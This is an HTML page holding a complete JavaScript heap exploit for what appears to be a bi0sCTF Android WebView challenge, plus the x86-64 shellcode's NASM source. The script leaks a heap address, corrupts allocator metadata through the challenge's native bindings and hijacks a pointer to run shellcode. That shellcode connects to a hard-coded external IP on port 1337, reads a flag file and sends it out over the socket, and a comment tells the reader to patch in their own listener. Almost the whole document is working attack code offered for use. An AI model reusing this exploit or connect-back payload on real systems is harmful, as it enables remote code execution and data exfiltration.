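<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>babu</title>
</head>
<body>
<p>bob</p>
<!-- smoke test that script execution works in the challenge WebView before the exploit runs -->
<script>document.write("JS WORKS ? test")</script>
<!-- body is closed exactly once, at the end of the file after the exploit script (the page previously emitted a second </body> here) -->
<script>console.log(1234)</script>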
<script type="text/javascript">
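function p64(data){
  // Pack a non-negative integer into 8 little-endian bytes and return them as a
  // binary string (one char per byte) so results can be concatenated with `+`
  // and then turned into a byte array by fin().
  //
  // Throws RangeError when the value cannot be represented exactly: a JS number
  // only holds integers up to 2^53 - 1, so packing a larger 64-bit address or
  // size from a plain number would silently emit wrong bytes. Negative or
  // fractional input is rejected for the same reason rather than returning
  // eight NUL bytes.
  if (!Number.isSafeInteger(data) || data < 0) {
    throw new RangeError(`p64: value must be a non-negative safe integer, got ${data}`)
  }
  const bytes = new Uint8Array(8)   // zero-filled, so unused high bytes stay 0
  let rest = data
  for (let i = 0; i < 8 && rest > 0; i++) {
    // `% 256` rather than `& 0xff`: bitwise ops truncate to 32 bits first.
    bytes[i] = rest % 256
    rest = Math.floor(rest / 256)
  }
  return String.fromCharCode(...bytes)
}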
function fin(data){
  // Turn a binary string (one byte per character, as produced by p64()) into a
  // plain array of char codes — the payload form handed to secure_talloc.
  // Iterates by code point, so a character above U+FFFF contributes only its
  // high surrogate; every payload in this file is made of chars < 0x100.
  return Array.from(data, (ch) => ch.charCodeAt(0))
}
function u64(data){
  // Decode a little-endian hex dump (e.g. "0800414100000000") into a number by
  // reversing its byte pairs and parsing the result as big-endian hex.
  // Caveats: values above 2^53 - 1 lose precision in a JS number, a trailing odd
  // nibble is dropped, and an input shorter than two characters makes
  // String.prototype.match return null (TypeError on .reverse).
  const bytePairs = data.match(/../g)
  const bigEndianHex = bytePairs.reverse().join('')
  return parseInt(bigEndianHex, 16)
}
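// Challenge password handed to every bi0sctf.secure_* call. Declared with const
// instead of an implicit global; nothing in this page reads it via `window`.
const pass = "50133tbd5mrt1769"

// NOTE(review): every offset below (-64, +0x58, +16, +0x28, 0x41410008/0x41410018,
// the 0x31/0x41/0x30/0x80 chunk-header words) is specific to this challenge's
// allocator and binary, and the calls are order-dependent — do not reorder them.

// Stage 1 - leak a heap address. secure_talloc appears to return the address of
// the chunk it created; the -64 adjustment to reach the heap base is an
// assumption carried over from the original exploit.
const h1 = bi0sctf.secure_talloc(pass, 0x20, fin(p64(0) + p64(0) + p64(0x31)))
const heap = h1-64

// Stage 2 - get an allocation on the metadata at the heap start (pointers).
const a = bi0sctf.secure_talloc(pass, 0x20, fin("BBBB"))
const b = bi0sctf.secure_talloc(pass, 0x90, fin("BBBB"))
console.log("Starting Exploit");
bi0sctf.secure_tree(pass, a)
bi0sctf.secure_tree(pass, heap+0x58)
bi0sctf.secure_talloc(pass, 0x20, fin(p64(0) + p64(0) + p64(0x41) + p64(heap+16)))

// Intermediate step - allocation prepared here is reused in later stages.
console.log("reached intermidiate")
bi0sctf.secure_talloc(pass, 0x20, fin(p64(0) + p64(heap+0x28) + p64(0x80)))
console.log("Stage 3 - middle")

// Stage 3 (middle) - setup: free b, then plant fake chunk headers pointing at 0x41410008.
bi0sctf.secure_tree(pass, b)
const yello = bi0sctf.secure_talloc(pass, 0x80, fin(p64(0) + p64(0) + p64(0x30) + p64(0x41410008) + p64(0x41410008) + "XXXXXXXX" ))
bi0sctf.secure_tree(pass, heap+16)
bi0sctf.secure_talloc(pass, 0x20, fin(p64(yello+24) + p64(0)))
bi0sctf.secure_talloc(pass, 0x20, [])
console.log("Stage - 3")

// Stage 3 - overwrite the run debug to get the pointer to the exec region.
bi0sctf.secure_tree(pass, heap+16)
bi0sctf.secure_talloc(pass, 0x20, fin(p64(0x41410008+16)))

// x86-64 Linux shellcode (assembled from the nasm listing that follows this
// HTML): socket + connect back to a hard-coded IPv4 address, open and read
// /data/data/bi0sctf.android.challenge/flag (the path is also visible as the
// trailing ASCII bytes), write 0x50 bytes from the stack to the socket, exit.
// NOTE(review): the four bytes after "\x68" ("\x7a\xb2\x5d\x60", i.e. what
// looks like 122.178.93.96) are sin_addr and "\x05\x39" after "\x66\x68" is
// sin_port in network order (1337). The assembly template has 0x41414141 as a
// placeholder there; patch both to your own listener before use. Every byte is
// < 0x100, so fin() maps the string 1:1 to bytes.
const shellcode = "\x6a\x29\x58\x6a\x02\x5f\x6a\x01\x5e\x31\xd2\x0f\x05\x49\x89\xc1\x6a\x2a\x58\x4c\x89\xcf\x52\x52\x68\x7a\xb2\x5d\x60\x66\x68\x05\x39\x66\x6a\x02\x48\x89\xe6\x48\x83\xc2\x10\x0f\x05\xb8\x02\x00\x00\x00\x41\xb8\x67\x00\x00\x00\x41\x50\x49\xb8\x65\x6e\x67\x65\x2f\x66\x6c\x61\x41\x50\x49\xb8\x69\x64\x2e\x63\x68\x61\x6c\x6c\x41\x50\x49\xb8\x74\x66\x2e\x61\x6e\x64\x72\x6f\x41\x50\x49\xb8\x74\x61\x2f\x62\x69\x30\x73\x63\x41\x50\x49\xb8\x2f\x64\x61\x74\x61\x2f\x64\x61\x41\x50\x48\x89\xe7\xbe\x00\x00\x00\x00\xba\x00\x00\x00\x00\x0f\x05\x48\x89\xc7\xb8\x00\x00\x00\x00\x48\x89\xe6\xba\x50\x00\x00\x00\x0f\x05\xb8\x01\x00\x00\x00\x4c\x89\xcf\x48\x89\xe6\xba\x50\x00\x00\x00\x0f\x05\x6a\x3c\x58\x0f\x05\x2f\x64\x61\x74\x61\x2f\x64\x61\x74\x61\x2f\x62\x69\x30\x73\x63\x74\x66\x2e\x61\x6e\x64\x72\x6f\x69\x64\x2e\x63\x68\x61\x6c\x6c\x65\x6e\x67\x65\x2f\x66\x6c\x61\x67"
// Address of the chunk holding the shellcode; kept for debugging in the console.
const shell = bi0sctf.secure_talloc(pass, 0x100 , fin(shellcode))
console.log("Stage - 4")

// Stage 4 - overwrite the debugger with the address of the shellcode.
bi0sctf.secure_tree(pass, heap+16)
bi0sctf.secure_talloc(pass, 0x20, fin(p64(0) + p64(0) + p64(0) +p64(0x41410018)))
console.log("Stage - 5")

// Stage 5 - trigger the call into the shellcode.
bi0sctf.secure_talloc(pass, 0x20, fin(p64(69)))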
</script>
</body>
</html>
; x86-64 Linux shellcode (nasm syntax); its bytes are the `shellcode` string in
; the HTML above. Flow: socket -> connect back to a hard-coded IPv4 address ->
; open and read the flag file -> write 0x50 bytes to the socket -> exit.
; It relies on rdx staying 0 from `xor edx, edx` through `connect`
; (the syscall instruction only clobbers rcx/r11).
global _start
section .text
_start:
socket:
push 0x29 ; SYS_socket
pop rax
push 0x02 ; AF_INET
pop rdi
push 0x01 ; SOCK_STREAM
pop rsi
xor edx, edx ; protocol 0; also the zero reused below as sockaddr padding
syscall
mov r9, rax ; keep the socket fd in r9 for the final write
connect:
push 0x2a ; SYS_connect
pop rax
mov rdi, r9
; build struct sockaddr_in (16 bytes) on the stack, last field first
push rdx ; sin_zero padding (rdx is still 0)
push rdx
push 0x41414141 ; sin_addr. NOTE(review): this is NOT INADDR_ANY (that is 0) — "AAAA" looks like a placeholder to be patched with the listener's IP; the JS copy of this shellcode carries a different value at this position
push word 0x3905 ; sin_port, stored as bytes 05 39 = 0x0539 in network order, i.e. port 1337
push word 0x0002 ; sin_family = AF_INET
mov rsi, rsp ; rsi -> sockaddr_in
add rdx, 0x10 ; addrlen = 16 (assumes rdx is still 0)
syscall
open:
mov rax, 2 ; SYS_open
; push the NUL-terminated path "/data/data/bi0sctf.android.challenge/flag" in
; 8-byte little-endian pieces from the end, so rsp ends up at its first byte
mov r8, 0x0000000000000067 ; "g\0"
push r8
mov r8, 0x616c662f65676e65 ; "enge/fla"
push r8
mov r8, 0x6c6c6168632e6469 ; "id.chall"
push r8
mov r8, 0x6f72646e612e6674 ; "tf.andro"
push r8
mov r8, 0x63733069622f6174 ; "ta/bi0sc"
push r8
mov r8, 0x61642f617461642f ; "/data/da"
push r8
mov rdi, rsp ; pathname
mov rsi, 0 ; O_RDONLY
mov rdx, 0 ; mode (ignored without O_CREAT)
syscall
read:
mov rdi, rax ; fd from open; no error check — a negative value simply makes read fail
mov rax, 0 ; SYS_read
mov rsi, rsp ; reuse the path bytes on the stack as the read buffer
mov rdx, 0x50 ; read up to 0x50 bytes
syscall
write:
mov rax, 0x1 ; SYS_write
mov rdi, r9 ; the connected socket
mov rsi, rsp
mov rdx, 0x50 ; NOTE(review): always sends 0x50 bytes, not the count read() returned, so stack residue past the flag is leaked as well
syscall
finish:
push 0x3c ; SYS_exit
pop rax
syscall
path: db "/data/data/bi0sctf.android.challenge/flag", 0 ; data copy of the path; `open` rebuilds it via the pushes above and never references this label